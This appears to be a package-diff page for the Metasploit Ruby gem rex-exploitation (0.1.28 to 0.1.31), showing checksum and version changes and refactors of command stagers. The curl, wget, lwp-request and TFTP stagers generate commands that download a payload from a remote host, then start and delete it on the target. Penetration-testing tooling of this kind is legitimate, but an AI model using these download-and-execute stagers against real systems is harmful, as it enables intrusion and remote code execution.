rex-exploitation 0.1.28 → 0.1.31

Sign up to get free protection for your applications and to get access to all the features.
Files changed (11) hide show
  1. checksums.yaml +4 -4
  2. checksums.yaml.gz.sig +0 -0
  3. data/.github/workflows/verify.yml +1 -0
  4. data/lib/rex/exploitation/cmdstager/curl.rb +4 -2
  5. data/lib/rex/exploitation/cmdstager/lwprequest.rb +5 -1
  6. data/lib/rex/exploitation/cmdstager/tftp.rb +35 -23
  7. data/lib/rex/exploitation/cmdstager/wget.rb +5 -2
  8. data/lib/rex/exploitation/version.rb +1 -1
  9. data.tar.gz.sig +0 -0
  10. metadata +2 -2
  11. metadata.gz.sig +0 -0
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: a55ad0e209e6bfeaccd5e0b21a6fab185a3607f0563281402aa7b3f471770f26
4
- data.tar.gz: cab2892ed7e9a51590fd7e0214d0b5eb0d46c6b8ed090deb2f877e85e7d6b841
3
+ metadata.gz: 4cfc7e897b1f86f34cca1faca892489b396c010b3c7135c0954c0d6c720a8bea
4
+ data.tar.gz: '0289f22adbe9e4d83b786b8518653977e57b35e6456dedd1a546ca5d8e5289bb'
5
5
  SHA512:
6
- metadata.gz: 04cd73b0220b13a6bfd2b67272a79ee8c86de698bacf7e36dfd404197d5bf27b3070fe9581de4e34eecdefcf4791c51681ef97d706d7a88ae52efd4f1637b7fd
7
- data.tar.gz: 9f2b81f309f8214333ab91dd6f475a6be9cf050c689df8daa9b044155e83406777d4a51c155ea0a205b25bce7f845041311817e167eb9d57dba12a7f34b58bbd
6
+ metadata.gz: db9a31253749214b20d5a8a7bd58d16f72e540c3eb6a6291933220e7d5aad5286cc20bd4ffb6a15cf096ff6dbca49e74c492334d22a7fbaa798ba48e6eead925
7
+ data.tar.gz: be2a2215875f6ab4b5cf0f1752ac1a5fb11e2d20851e231bdb3bbc2775df84289912a3f95ae36480a2e7ec21db8c5bbaae311921c0b7a6612fef60dc7cd0000e
checksums.yaml.gz.sig CHANGED
Binary file
data/.github/workflows/verify.yml CHANGED
@@ -20,6 +20,7 @@ jobs:
20
20
  - 2.6
21
21
  - 2.7
22
22
  - 3.0
23
+ - 3.1
23
24
  test_cmd:
24
25
  - bundle exec rspec
25
26
 
data/lib/rex/exploitation/cmdstager/curl.rb CHANGED
@@ -24,11 +24,13 @@ class Rex::Exploitation::CmdStagerCurl < Rex::Exploitation::CmdStagerBase
24
24
 
25
25
  def generate_cmds_payload(opts)
26
26
  cmds = []
27
+ uri = opts[:payload_uri]
27
28
 
28
29
  if opts[:ssl]
29
- cmds << "curl -kso #{@payload_path} #{opts[:payload_uri]}"
30
+ cmds << "curl -kso #{@payload_path} #{uri}"
30
31
  else
31
- cmds << "curl -so #{@payload_path} #{opts[:payload_uri]}"
32
+ uri = uri.gsub(%r{^http://}, '') if opts[:no_proto]
33
+ cmds << "curl -so #{@payload_path} #{uri}"
32
34
  end
33
35
 
34
36
  cmds
data/lib/rex/exploitation/cmdstager/lwprequest.rb CHANGED
@@ -23,7 +23,11 @@ class Rex::Exploitation::CmdStagerLwpRequest < Rex::Exploitation::CmdStagerBase
23
23
  end
24
24
 
25
25
  def generate_cmds_payload(opts)
26
- ["lwp-request -m GET #{opts[:payload_uri]} > #{@payload_path}"]
26
+ uri = opts[:payload_uri]
27
+ unless opts[:ssl]
28
+ uri = uri.gsub(%r{^http://}, '') if opts[:no_proto]
29
+ end
30
+ ["lwp-request -m GET #{uri} > #{@payload_path}"]
27
31
  end
28
32
 
29
33
  def generate_cmds_decoder(opts)
data/lib/rex/exploitation/cmdstager/tftp.rb CHANGED
@@ -13,7 +13,7 @@ module Exploitation
13
13
  # be written to disk and executed.
14
14
  #
15
15
  # This particular version uses tftp.exe to download a binary from the specified
16
- # server. The original file is preserve, not encoded at all, and so this version
16
+ # server. The original file is preserved, not encoded at all, and so this version
17
17
  # is significantly simpler than other methods.
18
18
  #
19
19
  # Requires: tftp.exe, outbound udp connectivity to a tftp server
@@ -24,14 +24,24 @@ module Exploitation
24
24
 
25
25
  class CmdStagerTFTP < CmdStagerBase
26
26
 
27
- def initialize(exe)
28
- super
29
- @payload_exe = Rex::Text.rand_text_alpha(8) + ".exe"
27
+ def generate(opts = {})
28
+ if opts[:tftphost].nil?
29
+ raise "#{self.class.name}##{__callee__} missing opts[:tftphost]"
30
+ end
31
+
32
+ opts[:linemax] ||= @linemax
33
+ opts[:file] ||= "#{Rex::Text.rand_text_alpha(8)}.exe"
34
+ opts[:temp] ||= '%TEMP%'
35
+
36
+ @payload_exe = opts[:file]
37
+ @payload_path = opts[:temp] == '.' ? opts[:file] : "#{opts[:temp]}\\#{opts[:file]}"
38
+
39
+ generate_cmds(opts)
30
40
  end
31
41
 
32
42
  def setup(mod)
33
43
  self.tftp = Rex::Proto::TFTP::Server.new
34
- self.tftp.register_file(Rex::Text.rand_text_alphanumeric(8), exe)
44
+ self.tftp.register_file(@payload_exe, exe)
35
45
  self.tftp.start
36
46
  mod.add_socket(self.tftp) # Hating myself for doing it... but it's just a first demo
37
47
  end
@@ -40,28 +50,30 @@ class CmdStagerTFTP < CmdStagerBase
40
50
  self.tftp.stop
41
51
  end
42
52
 
43
- #
44
- # We override compress commands just to stick in a few extra commands
45
- # last second..
46
- #
47
- def compress_commands(cmds, opts)
48
- # Initiate the download
49
- cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:transid]} #{@tempdir + @payload_exe}"
50
-
51
- # Make it all happen
52
- cmds << "start #{@tempdir + @payload_exe}"
53
-
54
- # Clean up after unless requested not to..
55
- if (not opts[:nodelete])
56
- # XXX: We won't be able to delete the payload while it is running..
53
+ def generate_cmds_payload(opts)
54
+ cmds = []
55
+ # We can skip the destination argument if we're writing to the working directory,
56
+ # as tftp defaults to writing the file to the current directory with the same filename.
57
+ if opts[:file] == @payload_path
58
+ cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:file]}"
59
+ else
60
+ cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:file]} \"#{@payload_path}\""
57
61
  end
62
+ cmds
63
+ end
64
+
65
+ def generate_cmds_decoder(opts)
66
+ cmds = []
67
+ cmds << "start \"#{@payload_path}\""
68
+ # NOTE: We can't delete the payload while it is running.
69
+ cmds << "del \"#{@payload_path}\"" unless opts[:nodelete]
70
+ cmds
71
+ end
58
72
 
59
- super
73
+ def cmd_concat_operator
74
+ ' & '
60
75
  end
61
76
 
62
- # NOTE: We don't use a concatenation operator here since we only have a couple commands.
63
- # There really isn't any need to combine them. Also, the ms01_026 exploit depends on
64
- # the start command being issued separately so that it can ignore it :)
65
77
  attr_reader :exe
66
78
  attr_reader :payload_exe
67
79
  attr_accessor :tftp
data/lib/rex/exploitation/cmdstager/wget.rb CHANGED
@@ -24,12 +24,15 @@ class Rex::Exploitation::CmdStagerWget < Rex::Exploitation::CmdStagerBase
24
24
 
25
25
  def generate_cmds_payload(opts)
26
26
  cmds = []
27
+
28
+ uri = opts[:payload_uri]
27
29
  ncc = '--no-check-certificate'
28
30
 
29
31
  if opts[:ssl]
30
- cmds << "wget -qO #{@payload_path} #{ncc} #{opts[:payload_uri]}"
32
+ cmds << "wget -qO #{@payload_path} #{ncc} #{uri}"
31
33
  else
32
- cmds << "wget -qO #{@payload_path} #{opts[:payload_uri]}"
34
+ uri = uri.gsub(%r{^http://}, '') if opts[:no_proto]
35
+ cmds << "wget -qO #{@payload_path} #{uri}"
33
36
  end
34
37
 
35
38
  cmds
data/lib/rex/exploitation/version.rb CHANGED
@@ -1,5 +1,5 @@
1
1
  module Rex
2
2
  module Exploitation
3
- VERSION = "0.1.28"
3
+ VERSION = "0.1.31"
4
4
  end
5
5
  end
data.tar.gz.sig CHANGED
Binary file
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: rex-exploitation
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.1.28
4
+ version: 0.1.31
5
5
  platform: ruby
6
6
  authors:
7
7
  - Metasploit Hackers
@@ -93,7 +93,7 @@ cert_chain:
93
93
  EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
94
94
  9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
95
95
  -----END CERTIFICATE-----
96
- date: 2021-09-16 00:00:00.000000000 Z
96
+ date: 2022-07-01 00:00:00.000000000 Z
97
97
  dependencies:
98
98
  - !ruby/object:Gem::Dependency
99
99
  name: rake
metadata.gz.sig CHANGED
Binary file